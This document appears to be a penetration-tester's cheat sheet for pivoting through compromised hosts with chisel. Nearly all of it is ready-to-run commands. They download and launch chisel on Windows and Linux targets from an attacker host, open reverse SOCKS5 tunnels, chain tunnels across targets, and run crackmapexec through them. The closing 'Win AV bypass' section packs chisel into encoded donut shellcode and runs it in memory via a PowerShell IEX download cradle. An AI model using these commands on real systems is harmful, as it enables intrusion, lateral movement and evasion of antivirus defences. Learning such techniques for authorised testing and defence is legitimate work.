Chisel

https://github.com/jpillora/chisel

https://github.com/jpillora/chisel/releases/latest

Chisel Instance

I use only one instance to manage multiple proxy endpoints.

(replace bla:bla with other random creds if you want to)

docker run --name chisel --rm -d -p0.0.0.0:443:80 jpillora/chisel server --socks5 --reverse -v --auth bla:bla --port 80
docker inspect --format '{{ .NetworkSettings.IPAddress }}' chisel # Get container ip, probably 172.17.0.2
docker logs chisel -f # Stream logs

Target as Socks5

Upload chisel on target, and link it to chisel server.

Don’t forget to set credentials if you replaced them in the first place.

POWERSHELL

(New-Object System.Net.WebClient).DownloadFile("http://ATTACKER/chisel.exe", "$env:TEMP\chisel.exe")
Start-Process -NoNewWindow -FilePath "$env:TEMP\chisel.exe" -ArgumentList "client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks"

CMD ALTERNATIVE

START "" "/users/user/chisel.exe" client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks
# If you need to kill all chisel processes ...
# taskkill /F /IM chisel.exe

Linux

wget http://ATTACKER/chisel -O /tmp/chisel;chmod 755 /tmp/chisel
/tmp/chisel client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks &

Great, our chisel container now listen on port 5000 as socks5 !

Here is an example about how to use it with proxychains

echo -e '[ProxyList]\nsocks5 172.17.0.2 5000'>/tmp/TARGET1
proxychains -q -f /tmp/TARGET1 crackmapexec smb TARGET_NETWORK

Target as Listener

You want the target to listen on a port and forward the traffic back to you ?

Let’s say you want to chain multiple chisel

TARGET2 => TARGET1:7777 => ATTACKER:443

Linux

# Target1
chisel client -v --auth bla:bla ATTACKER:443 TARGET1IP:7777:ATTACKER:443 &

# Target2 (socks5)
chisel client -v --auth bla:bla TARGET1IP:7777 R:0.0.0.0:6000:socks &

# Attacker
echo -e '[ProxyList]\nsocks5 172.17.0.2 6000'>/tmp/TARGET2
proxychains -q -f /tmp/TARGET2 crackmapexec smb TARGET2_NETWORK

Expose Target Local Port

Target is listening locally and you want to access the port from remote.

You bind your local port (here 8888 on chisel container) and forward traffic to the target localhost:3306

Linux

/root/chisel client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:8888:127.0.0.1:3306 &

Win AV bypass

(You need the loadsc script https://offensive.run/winecosystem/lpe/README.html#av-bypass)

LHOST="192.168.45.216"
LPORT=443

PARAMS="client -v --auth bla:bla $LHOST:$LPORT R:0.0.0.0:5000:socks"
INPUT_FILE='/var/www/html/chisel.exe'
SHELLCODE_OUTPUT_FILE='/tmp/chiselsc'
ENCODED_PAYLOAD_FILE='/var/www/html/chiselsc'
python3 -c "import donut; donut.create(thread=0,compress=2,bypass=1,exit_opt=3,arch=2,file='$INPUT_FILE',output='$SHELLCODE_OUTPUT_FILE',params=bytes.fromhex('$( echo -en "$PARAMS" | xxd -plain | tr -d '\n' )').decode('utf-8'))"
cat "$SHELLCODE_OUTPUT_FILE" | xxd -plain | tr -d '\n' | rev | gzip | sudo tee "$ENCODED_PAYLOAD_FILE" >/dev/null

cat <<'EOF'|sudo tee /var/www/html/startchisel
$loadsc="$web/loadsc"; $sc="$web/chiselsc"; $python="$web/python.zip"; $dir="$env:TEMP";
$Exists = Test-Path "$dir\python\";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,"$dir\python.zip");Add-Type -assembly "system.io.compression.filesystem";[io.compression.zipfile]::ExtractToDirectory("$dir\python.zip", "$dir\python\")};
$arguments = @("-c","""import urllib.request as r;exec(bytes.fromhex(r.urlopen('$loadsc').read()[::-1].decode('utf-8')));load('$sc')""")
Start-Process -NoNewWindow -FilePath "$dir\python\python.exe" -ArgumentList $arguments
EOF

Then call chisel

$web="http://192.168.45.216";IEX(New-Object Net.WebClient).downloadString("$web/startchisel")